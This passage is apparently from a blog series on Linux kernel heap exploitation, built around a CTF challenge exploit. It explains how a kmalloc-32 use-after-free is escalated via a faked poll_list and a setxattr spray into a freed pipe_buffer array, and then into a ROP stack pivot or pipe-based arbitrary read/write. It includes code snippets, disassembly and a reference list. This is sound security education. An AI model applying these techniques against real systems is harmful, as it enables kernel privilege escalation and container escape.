<p>[13] https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html</p>

<p>[14] https://lwn.net/Articles/531114/</p>

<p>[15] https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html</p>

<p>[16] https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation</p>

<p>[17] https://docs.docker.com/engine/security/userns-remap/</p>

<p>[18] https://docs.docker.com/engine/security/apparmor/</p>

<p>[19] https://github.com/moby/moby/blob/master/profiles/apparmor/template.go</p>

<p>[20] https://starlabs.sg/blog/2023/07-a-new-method-for-container-escape-using-file-based-dirtycred/</p>

<p>[21] https://www.offensivecon.org/speakers/2023/alex-plaskett-and-cedric-halbronn.html</p>

<p>[22] https://github.com/vobst/ctf-corjail-public/blob/master/test_privesc.c</p>

<p>[23] https://github.com/vobst/like-dbg-fork-public/blob/master/io/scripts/gdb_script_test_privesc.py</p>

<p>[24] https://www.offensivecon.org/speakers/2020/alexander-popov.html</p>

<p>[25] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/fork.c#L1637</p>

<p>[26] https://elixir.bootlin.com/linux/v5.10.127/source/fs/namespace.c#L4111</p>

<p>[27] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/entry/entry_64.S#L95</p>

<p>[28] https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/entry/entry_64.S#L571</p>

<p>[29] https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rop.c#L112</p>

<p>[30] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/kmod.c#L93</p>

<p>[31] https://www.kernelconfig.io/config_static_usermodehelper?arch=x86&amp;kernelversion=6.3.12</p>

<p>[32] https://github.com/a13xp0p0v/kconfig-hardened-check</p>

<p>[33] https://github.com/a13xp0p0v/linux-kernel-defence-map</p>

<p>[34] https://mxatone.medium.com/randomizing-the-linux-kernel-heap-freelists-b899bb99c767</p>

<p>[35] https://www.usenix.org/conference/usenixsecurity22/presentation/zeng</p>

<p>[36] https://lwn.net/Articles/938637/</p>

<p>[37] https://www.usenix.org/conference/usenixsecurity23/presentation/lee-yoochan</p>

<p>[38] https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game</p>

<p>[39] https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README</p>

<p>[40] https://googleprojectzero.blogspot.com/2023/08/summary-mte-as-implemented.html</p>

<p>[41] https://www.youtube.com/watch?v=UwMt0e_dC_Q</p>

<p>[42] https://github.com/thejh/linux/commit/f3afd3a2152353be355b90f5fd4367adbf6a955e</p>

<p>[43] https://en.wikipedia.org/wiki/Control-flow_integrity#Microsoft_Control_Flow_Guard</p>

<p>[44] https://googleprojectzero.blogspot.com/2019/02/examining-pointer-authentication-on.html</p>

<p>[45] https://bazad.github.io/presentations/BlackHat-USA-2020-iOS_Kernel_PAC_One_Year_Later.pdf</p>

<p>[46] https://lwn.net/Articles/926649/</p>

<p>[47] https://lwn.net/Articles/940403/</p>

<p>[48] https://elixir.bootlin.com/linux/v5.10.127/source/arch/arm64/Kconfig#L1510</p>

<p>[49] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1215</p>

<p>[50] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1363</p>

<p>[51] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1382</p>

<p>[52] https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1326</p>

<p>[53] https://a13xp0p0v.github.io/2021/08/25/lkrg-bypass.html</p>

<p>[54] https://github.com/milabs/lkrg-bypass</p>

<p>[55] https://blog.siguza.net/APRR/</p>

<p>[56] https://www.google.com/url?q=https://bazad.github.io/presentations/BlackHat-USA-2020-iOS_Kernel_PAC_One_Year_Later.pdf&amp;sa=U&amp;ved=2ahUKEwiIg_GSgteAAxWzK7kGHYCgCdUQFnoECAoQAg&amp;usg=AOvVaw12Yeao3WAUNwGg03EwzZib</p>

<p>[57] https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs</p>

<p>[58] https://www.samsungknox.com/en/blog/real-time-kernel-protection-rkp</p>

<p>[59] https://googleprojectzero.blogspot.com/2017/02/lifting-hyper-visor-bypassing-samsungs.html</p>

<p>[60] https://github.com/heki-linux</p>]]></content><author><name></name></author><summary type="html"><![CDATA[_Note: This is the third post in a series on Linux heap exploitation. It assumes that you have read the first [0] and second part [1]. You can experiment with the exploit [2] yourself using the kernel debugging setup [3] that was published alongside this series.]]></summary></entry><entry><title type="html">Linux S1E2: From UAF in km32 to IP Control or Arbitrary Read-Write</title><link href="https://blog.eb9f.de/2023/08/05/Linux-S1-E2.html" rel="alternate" type="text/html" title="Linux S1E2: From UAF in km32 to IP Control or Arbitrary Read-Write" /><published>2023-08-05T00:00:00+00:00</published><updated>2023-08-05T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/08/05/Linux-S1-E2</id><content type="html" xml:base="https://blog.eb9f.de/2023/08/05/Linux-S1-E2.html"><![CDATA[<p>_Note: This is the second post in a series on Linux heap exploitation. It assumes that you have read the first part [<a href="https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html">0</a>]. You can play with the exploit [<a href="https://github.com/vobst/ctf-corjail-public">1</a>] yourself using the kernel debugging setup [<a href="https://github.com/vobst/like-dbg-fork-public">2</a>] published alongside this series.</p>

<p>We concluded the previous post by abusing a use-after-free (UAF) in the kmalloc-32 cache to leak three kernel pointers. Now, we will use those leaks to cause another UAF, this time in the kmalloc-1k cache. By the end of this post, we will have learned how to turn this second, more powerful UAF either into kernel code execution via ROP or into an arbitrary read-write primitive via pipes.</p>

<h2 id="causing-a-more-powerful-uaf">Causing a More Powerful UAF</h2>
<p>At the moment, we have a UAF in kmalloc-32 to play with. However, many standard techniques for constructing code execution or arbitrary read/write primitives require a UAF in a larger cache, e.g., the normal kmalloc-1k cache.</p>

<p>We begin by introducing the ansatz used to create another UAF from a conceptual standpoint before discussing its concrete realization. For starters, suppose that we can allocate a node of some singly linked list on the UAF slot in kmalloc-32, cf. the figure below (the red cross indicates a dangling reference).</p>

<p><img src="/media/Linux-S2/ssl_arb_free_1.jpg" alt="" /></p>

<p>Causing a free of the dangling reference will now allow us to replace the node with another object. If we can control the contents of the reclaiming object, we can fake a list node to include an unsuspecting object at a known address in the list, cf. the figure below.</p>

<p><img src="/media/Linux-S2/ssl_arb_free_2.jpg" alt="" /></p>

<p>Having read the previous blog post, you might have already guessed what will happen next: we trigger a list cleanup and arbitrarily free the unsuspecting object, i.e., we constructed the primitive to free an arbitrary pointer.</p>
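<p>The mechanics can be modeled in user space. In the sketch below (illustrative only, not the kernel’s actual list code), the cleanup walk passes every reachable node to the free function, so a corrupted next pointer turns the walk into a free of an arbitrary address:</p>

```c
#include <assert.h>
#include <stddef.h>

/* User-space model of a singly-linked-list cleanup. Every node reachable
 * via next is handed to the free routine, so if an attacker controls one
 * node's next pointer, an arbitrary address gets freed. */
struct node { struct node *next; };

static void *freed[8];
static int nfreed;

/* Stand-in for kfree() that just records its argument. */
static void record_free(void *p)
{
    freed[nfreed++] = p;
}

static void list_cleanup(struct node *head)
{
    while (head) {
        struct node *next = head->next; /* read before the node is "freed" */
        record_free(head);
        head = next;
    }
}
```

Note that the walk reads the next pointer before freeing the node, which is exactly why planting a fake next pointer in the first QWORD of the UAF slot is sufficient.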

<p>Realizing this idea will again be done by corrupting a <code class="language-plaintext highlighter-rouge">poll_list</code>. First, we must decide which kind of object we would like to free. Recall that we leaked the address of a slot in a kmalloc-1k slab that is currently occupied by a <code class="language-plaintext highlighter-rouge">tty_struct</code>. However, nothing prevents us from allocating another object in its place, and we are going to use this freedom to allocate an array of <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/pipe_fs_i.h#L26"><code class="language-plaintext highlighter-rouge">pipe_buffer</code></a> structures at the known address. One such array is allocated whenever a new pipe is created [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/pipe.c#L806">4</a>]. We will elaborate on the semantics of these objects later; for the moment, trust me that they make these objects interesting for exploitation. The next figure shows the desired memory transformation, starting from the memory layout we finished with at the end of the previous post.</p>

<p><img src="/media/Linux-S2/trade_tty.jpg" alt="" /></p>

<p><em>Note: Experiments showed an increase in exploit stability when performing this step last. Conceptually this changes nothing, as long as the replacement happens before the pointer is freed, but it might throw you off when reading the code [<a href="https://github.com/vobst/ctf-corjail-public/blob/master/sploit.c#L478">5</a>]. The decrease in stability makes sense as freeing the ttys is a rather noisy operation that, among other things, frees up many slots in the kmalloc-32 slab containing the UAF slot.</em></p>

<p>Next, we are going to free up the UAF slot and allocate a <code class="language-plaintext highlighter-rouge">poll_list</code> node on it. Recall that the slot is currently shared by a <code class="language-plaintext highlighter-rouge">user_key_payload</code> and a <code class="language-plaintext highlighter-rouge">seq_operations</code> structure. We do not know which <code class="language-plaintext highlighter-rouge">seq_operations</code> occupies the UAF slot; however, we do know which key is corrupted. Thus, we avoid having to free many objects at once by using the key to free up the UAF slot. Spraying another round of <code class="language-plaintext highlighter-rouge">poll_list</code> lists reclaims the slot and leaves us with the following situation in kmalloc-32.</p>

<p><em>Aside: At this point, we meet a potential problem: user keys are freed via a Read Copy Update (RCU) callback [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/security/keys/user_defined.c#L128">6</a>]. RCU is a generic technique to improve the performance of shared read-mostly data structures. The idea is that readers enter a so-called RCU read-side critical section before accessing the data structure. While inside this section they are guaranteed that entries they obtain will remain valid, i.e., not be destroyed by someone who is concurrently manipulating the same data structure. This is achieved by delaying the actual destruction of an entry until all preexisting read-side critical sections are finished, i.e., after waiting for the so-called RCU grace period [<a href="https://pdos.csail.mit.edu/6.S081/2022/readings/rcu-decade-later.pdf">7</a>]. Regarding exploitation, this means that there is no point in starting to spray the heap right after an object we want to reclaim has been marked for freeing by RCU. Instead, we want to spray right after the object has been freed. Luckily, there is a system call that does nothing but wait until an RCU grace period has elapsed before returning, and we can use it to synchronize the start of our spray [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/sched/membarrier.c#L470">8</a>] [<a href="https://github.com/lrh2000/StackRot">9</a>].</em></p>

<p><img src="/media/Linux-S2/poll_list_alloc.jpg" alt="" /></p>

<p>Finally, what remains is to replace the <code class="language-plaintext highlighter-rouge">poll_list</code> allocated on the UAF slot with a fake one that points to the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array living in kmalloc-1k. For that purpose, we free all the <code class="language-plaintext highlighter-rouge">seq_operations</code> and use the setxattr technique to write the fake next pointer to the first QWORD of the vacant slots. However, leaving the UAF slot unoccupied for too long is not a good idea as it might lead to double frees, or unpredictable behavior in case the slot is reclaimed by an unrelated object. Thus, we “conserve” the fake pointer by allocating a <code class="language-plaintext highlighter-rouge">user_key_payload</code>, which leaves the first two QWORDs untouched.</p>

<p><img src="/media/Linux-S2/poll_list_arb_free.jpg" alt="" /></p>
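<p>For reference, the setxattr part of the step above can be sketched like this (target path and attribute name are arbitrary): the kernel copies the attribute value into a temporary kmalloc buffer of the requested size and frees it again when the call finishes, so for a short window our fake next pointer sits in a freed kmalloc-32 slot.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <sys/xattr.h>

/* Sketch of the setxattr technique. Requesting a 32-byte value makes the
 * kernel allocate the temporary copy from kmalloc-32; the first QWORD of
 * the payload becomes the fake poll_list next pointer. Whether the call
 * itself succeeds is irrelevant, only the kernel-side copy matters. */
static int write_fake_next_ptr(uint64_t fake_next)
{
    uint8_t payload[32];

    memset(payload, 0, sizeof(payload));
    memcpy(payload, &fake_next, sizeof(fake_next)); /* first QWORD: next */
    return setxattr("/tmp", "user.hax", payload, sizeof(payload), 0);
}
```

The subsequent <code class="language-plaintext highlighter-rouge">user_key_payload</code> allocation then “conserves” the planted pointer, as described above.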

<p>Returning from the poll system call will now arbitrarily free a bunch of <code class="language-plaintext highlighter-rouge">pipe_buffer</code>s. This is our more powerful UAF. Thanks for staying with me throughout this tedious sequence of steps. Now I owe you an explanation of why it was worth going through this pain.</p>

<p><em>Aside: Some techniques are applicable without this extra sequence of steps. For example, we could trigger the destruction of the slab that contains the UAF slot, causing the backing page to be returned to the Page Allocator. Since the pages backing kmalloc-32 slabs are of order zero, i.e., a kmalloc-32 slab is made of 2^0 pages, it is simple to re-allocate the page as last-level user page tables. Accessing the UAF slot through a dangling pointer will now operate directly on user page table entries, which already sounds like a recipe for disaster. With a little work, this situation can be turned into a strong read-write primitive for physical memory that allows for trivial privilege escalation, e.g., by patching the kernel text [<a href="https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">10</a>] [<a href="https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html">11</a>].</em></p>

<h2 id="abusing-fake-c-for-stack-pivots">Abusing Fake C++ for Stack Pivots</h2>

<p>There is a C coding pattern, found in many large code bases, where an instance of a generic structure type might represent one of many more concrete objects. If this reminds you of runtime polymorphism, you are on the right track. The poster child example in Linux is probably <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/fs.h#L916"><code class="language-plaintext highlighter-rouge">struct file</code></a>. There is one for every open file in the system, and as you have probably heard a hundred times, for user space “everything is a file”. This leaves the kernel with a situation where an instance of a <code class="language-plaintext highlighter-rouge">file</code> might represent a hardware timer, a BPF map, a development board, an end of a pipe, a network connection, or … an ordinary file on an ordinary hard disk using an ordinary ext4 filesystem.</p>

<p>To manage this situation, the generic structure has two key fields</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">file</span> <span class="p">{</span>
	<span class="p">...</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span>	<span class="o">*</span><span class="n">f_op</span><span class="p">;</span>
    <span class="p">...</span>
	<span class="kt">void</span>			<span class="o">*</span><span class="n">private_data</span><span class="p">;</span>
    <span class="p">...</span>
<span class="p">}</span> <span class="n">__randomize_layout</span>
</code></pre></div></div>
<p>where the first one, i.e., <code class="language-plaintext highlighter-rouge">f_op</code>, is defined as another rather generic struct, this time full of function pointers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">file_operations</span> <span class="p">{</span>
    <span class="p">...</span>
	<span class="kt">ssize_t</span> <span class="p">(</span><span class="o">*</span><span class="n">read</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="p">,</span> <span class="kt">char</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="p">);</span>
	<span class="kt">ssize_t</span> <span class="p">(</span><span class="o">*</span><span class="n">write</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">mmap</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">open</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span> <span class="n">__randomize_layout</span><span class="p">;</span>
</code></pre></div></div>
<p>High-level code, e.g., in the virtual file system layer, will perform the C equivalent of a virtual call to dispatch operations to the lower-level routines that know how to perform them for the given kind of file.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">ssize_t</span> <span class="nf">vfs_read</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">char</span> <span class="n">__user</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">count</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="n">pos</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">file</span><span class="o">-&gt;</span><span class="n">f_op</span><span class="o">-&gt;</span><span class="n">read</span><span class="p">)</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">file</span><span class="o">-&gt;</span><span class="n">f_op</span><span class="o">-&gt;</span><span class="n">read</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">count</span><span class="p">,</span> <span class="n">pos</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p><em>Aside: When reading kernel code those virtual calls are a frequent source of frustration as one oftentimes does not know which handler will be invoked for the object one is interested in. In such situations the rescue comes in the form of my favorite command: <code class="language-plaintext highlighter-rouge">trace-cmd</code> [<a href="https://www.youtube.com/watch?v=JRyrhsx-L5Y">12</a>]. For example, we can use it to easily resolve the read handlers for various kinds of files.</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /proc/sys/kernel/modprobe
cat-4497  [001] 13316.293420: funcgraph_entry:                   |  vfs_read() {
...
cat-4497  [001] 13316.293421: funcgraph_entry:      + 28.696 us  |    proc_sys_read();
cat-4497  [001] 13316.293450: funcgraph_exit:       + 29.772 us  |  }
$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /tmp/hax
cat-4519  [009] 13401.049113: funcgraph_entry:                   |  vfs_read() {
...
cat-4519  [009] 13401.049114: funcgraph_entry:        0.444 us   |    shmem_file_read_iter();
cat-4519  [009] 13401.049114: funcgraph_exit:         1.158 us   |  }
$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /home/archie/bar
cat-4539  [005] 13493.856387: funcgraph_entry:                   |  vfs_read() {
...
cat-4539  [005] 13493.856389: funcgraph_entry:        0.981 us   |    ext4_file_read_iter();
cat-4539  [005] 13493.856390: funcgraph_exit:         2.857 us   |  }
$ trace-cmd record -p function_graph -g vfs_read --max-graph-depth 2 -F cat /sys/fs/bpf/maps.debug
cat-4364  [004]   221.406352: funcgraph_entry:                   |  vfs_read() {
...
cat-4364  [004]   221.406352: funcgraph_entry:        0.863 us   |    bpf_seq_read();
cat-4364  [004]   221.406353: funcgraph_exit:         1.689 us   |  }
</code></pre></div></div>
<p>The subsystem code that creates the objects will usually set the vtable pointer to a subsystem-internal constant variable that specifies the functions that know how to operate on the file {1}. Furthermore, it usually stores a pointer to an object that holds more specific information in the <code class="language-plaintext highlighter-rouge">private_data</code> member {2}, which makes the information available to the handlers as their parameters always include a pointer to the file object that they were invoked on. Yes, this smells a lot like subclassing.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span> <span class="n">pipefifo_fops</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">...</span>
	<span class="p">.</span><span class="n">read_iter</span>	<span class="o">=</span> <span class="n">pipe_read</span><span class="p">,</span>
	<span class="p">.</span><span class="n">write_iter</span>	<span class="o">=</span> <span class="n">pipe_write</span><span class="p">,</span>
	<span class="p">...</span>
<span class="p">};</span>

<span class="kt">int</span> <span class="nf">create_pipe_files</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">**</span><span class="n">res</span><span class="p">,</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span> <span class="o">=</span> <span class="n">get_pipe_inode</span><span class="p">();</span>
	<span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">f</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">f</span> <span class="o">=</span> <span class="n">alloc_file_pseudo</span><span class="p">(</span><span class="n">inode</span><span class="p">,</span> <span class="n">pipe_mnt</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span>
				<span class="n">O_WRONLY</span> <span class="o">|</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="p">(</span><span class="n">O_NONBLOCK</span> <span class="o">|</span> <span class="n">O_DIRECT</span><span class="p">)),</span>
				<span class="o">&amp;</span><span class="n">pipefifo_fops</span><span class="p">);</span> <span class="c1">// {1}, sets f-&gt;f_op = &amp;pipefifo_fops</span>
	<span class="p">...</span>
	<span class="n">f</span><span class="o">-&gt;</span><span class="n">private_data</span> <span class="o">=</span> <span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_pipe</span><span class="p">;</span> <span class="c1">// {2}, struct pipe_inode_info *</span>
    <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Okay, but why care about object-oriented ideas in a programming language more than twice my age? We care because essentially all kernel exploits that gain code execution do so by corrupting an object that has a vtable with the intention of hijacking a virtual call. The idea is relatively straightforward: arbitrarily free an object at a known address and replace it with user-controlled data. The fake object’s vtable will point back into the controlled data, where the virtual call will finally find the address of a stack pivot gadget. Pivoting the stack into controlled data is feasible since at least the register providing the ‘self’ argument must point to the corrupted object; usually, more registers will contain useful values.</p>

<p><img src="/media/Linux-S2/sp_idea.jpg" alt="" /></p>

<p>There are a few properties that we would like the victim object to have:</p>
<ol>
  <li>Faking it should be easy. If the object is used in complicated ways before the virtual call happens, the bar for creating a convincing fake rises, which we want to avoid as we are lazy.</li>
  <li>Pivoting should be easy. At the point where we take instruction pointer (IP) control, the CPU registers should be full of pointers into controlled data such that we do not have to spend ages looking for ROP/JOP gadgets.</li>
  <li>Reclaiming it should be easy. While it is possible to reclaim objects across cache boundaries by taking a detour to the Page Allocator, it is better if the victim object is allocated in the same cache as an easily sprayable user data container.</li>
</ol>

<p>Luckily, our array of <code class="language-plaintext highlighter-rouge">pipe_buffer</code>s meets all three requirements.</p>

<p>When the last reference to a pipe is released, it will be destroyed. During that process, the code will eventually iterate over all <code class="language-plaintext highlighter-rouge">pipe_buffer</code>s and call their destructors. This is where we will take IP control.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">free_pipe_info</span><span class="p">(</span><span class="k">struct</span> <span class="n">pipe_inode_info</span> <span class="o">*</span><span class="n">pipe</span><span class="p">)</span> <span class="p">{</span>
    <span class="p">...</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">pipe</span><span class="o">-&gt;</span><span class="n">ring_size</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">pipe</span><span class="o">-&gt;</span><span class="n">bufs</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// dangling pointer</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">buf</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">)</span> <span class="c1">// {1}</span>
            <span class="n">pipe_buf_release</span><span class="p">(</span><span class="n">pipe</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="p">...</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">pipe_buf_release</span><span class="p">(</span><span class="k">struct</span> <span class="n">pipe_inode_info</span> <span class="o">*</span><span class="n">pipe</span><span class="p">,</span>
                                    <span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="o">*</span><span class="n">buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">pipe_buf_operations</span> <span class="o">*</span><span class="n">ops</span> <span class="o">=</span> <span class="n">buf</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">;</span>
    <span class="n">buf</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="c1">// `buf` points into our data and we control value of `ops`</span>
    <span class="n">ops</span><span class="o">-&gt;</span><span class="n">release</span><span class="p">(</span><span class="n">pipe</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Crafting our payload, however, requires examining what the compiler made of that code.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov	rcx, qword ptr [rbx + 152]          # rcx = pipe-&gt;bufs
movsxd	rdx, ebp
lea	rsi, [rdx + 4*rdx]
mov	rdx, qword ptr [rcx + 8*rsi + 16]   # rdx = (pipe-&gt;bufs+i)-&gt;ops
test	rdx, rdx
je	0xffffffff812f0d9f &lt;free_pipe_info+0x2f&gt;
lea	rax, [rcx + 8*rsi]
add	rax, 16                             # rax = &amp;(pipe-&gt;bufs+i)-&gt;ops
lea	rsi, [rcx + 8*rsi]                  # rsi = pipe-&gt;bufs+i
mov	qword ptr [rax], 0
mov	r11, qword ptr [rdx + 8]            # r11 = (pipe-&gt;bufs+i)-&gt;ops-&gt;release
mov	rdi, rbx
call	0xffffffff81e02300 &lt;__x86_indirect_thunk_r11&gt; # retpoline "call r11"
</code></pre></div></div>
<p>As we can see in the above listing, <code class="language-plaintext highlighter-rouge">rcx</code>, <code class="language-plaintext highlighter-rouge">rdx</code>, <code class="language-plaintext highlighter-rouge">rax</code>, and <code class="language-plaintext highlighter-rouge">rsi</code> hold interesting values. Equipped with that knowledge we can start crafting our ROP payload. Since we allocate our data as <code class="language-plaintext highlighter-rouge">user_key_payload</code> objects we must not forget to account for the structure header, which is unfortunately not under our control. Consequently, a naive overlay would result in the <code class="language-plaintext highlighter-rouge">len</code> field overlapping with the first buffer’s <code class="language-plaintext highlighter-rouge">ops</code> field, making the condition {1} pass on an uncontrolled value. However, as the SLUB allocator performs only limited alignment checks on allocations and frees, we can adjust the relative position by performing a misaligned free, causing the loop to skip the first buffer.</p>

<p><img src="/media/Linux-S2/pivot_on_pipe.jpg" alt="" /></p>

<p>The first gadget pivots the stack to the first QWORD of controlled data, while the second one skips over the part that was used to pivot the stack and leaves us at the start of the ROP chain responsible for privilege escalation.</p>

<p>Doing kernel ROP sounds cool, but in practice, it has several drawbacks that make it unattractive. For example, portability is hampered by the need to manually search for new ROP gadgets and control flow integrity (CFI) might make life harder on some platforms. Therefore, we will now discuss how to construct a primitive that will allow for a data-only privilege escalation.</p>

<p><em>Aside: While crafting my first kernel ROP chain I noticed that some things are different from user land exploitation. Let me elaborate on two of them here. First, the kernel is a self-modifying program. Thus, what you get when disassembling the image’s text section is not what you will find in executable memory at runtime. Fortunately, I read about this before it first happened to me, and thus I quickly figured out what was going on [<a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">13</a>]. Be advised to dump the executable mappings at runtime and use them as input for ROP gadget finders. The second thing is already visible in the assembly listing above, but it took me way longer to figure out. In fact, I have not read about it anywhere yet. To mitigate Spectre-family attacks, the kernel might use so-called retpolines when performing indirect control flow transfers [<a href="https://support.google.com/faqs/answer/7625886">14</a>]. Retpolines are semantically equivalent to <code class="language-plaintext highlighter-rouge">jmp REG</code> or <code class="language-plaintext highlighter-rouge">call REG</code> operations, which makes them interesting for building ROP chains, but they manifest as calls to fixed addresses in the disassembly. As I am used to discarding gadgets that end in calls to fixed addresses when building user land ROP chains, this oversight led me to miss many potentially useful gadgets.</em></p>

<h2 id="abusing-s-for-arbitrary-read-and-write">Abusing |’s for Arbitrary Read and Write</h2>
<p>Despite using pipelines in every second shell command, it was not until exploring the Dirty Pipe vulnerability that I had a look into their implementation [<a href="https://dirtypipe.cm4all.com/">15</a>] [<a href="https://lolcads.github.io/posts/2022/06/dirty_pipe_cve_2022_0847/">16</a>]. In essence, a pipe is a circular, in-kernel buffer that can be read from and written to by user space through file descriptors. For example, when executing a pipeline, the parent shell creates a pipe and hands the opposite ends to the subshells that execute the commands, which use them to connect their stdout and stdin streams.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ strace -e pipe2,dup2 -f sh -c "cat /tmp/hax | cat"
pipe2([3, 4], 0)                       = 0
strace: Process 4975 attached
[pid 4975] dup2(4, 1)                 = 1
strace: Process 4976 attached
[pid 4976] dup2(3, 0)                 = 0
</code></pre></div></div>
<p>For each pipe, the kernel maintains a <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/pipe_fs_i.h#L58"><code class="language-plaintext highlighter-rouge">pipe_inode_info</code></a> structure that, among other things, tracks the positions in the circular buffer that data will be read from or written to the next time user space interacts with the pipe. The next figure shows a partially filled pipe.</p>

<p><img src="/media/Linux-S2/pipe_simple.jpg" alt="" /></p>

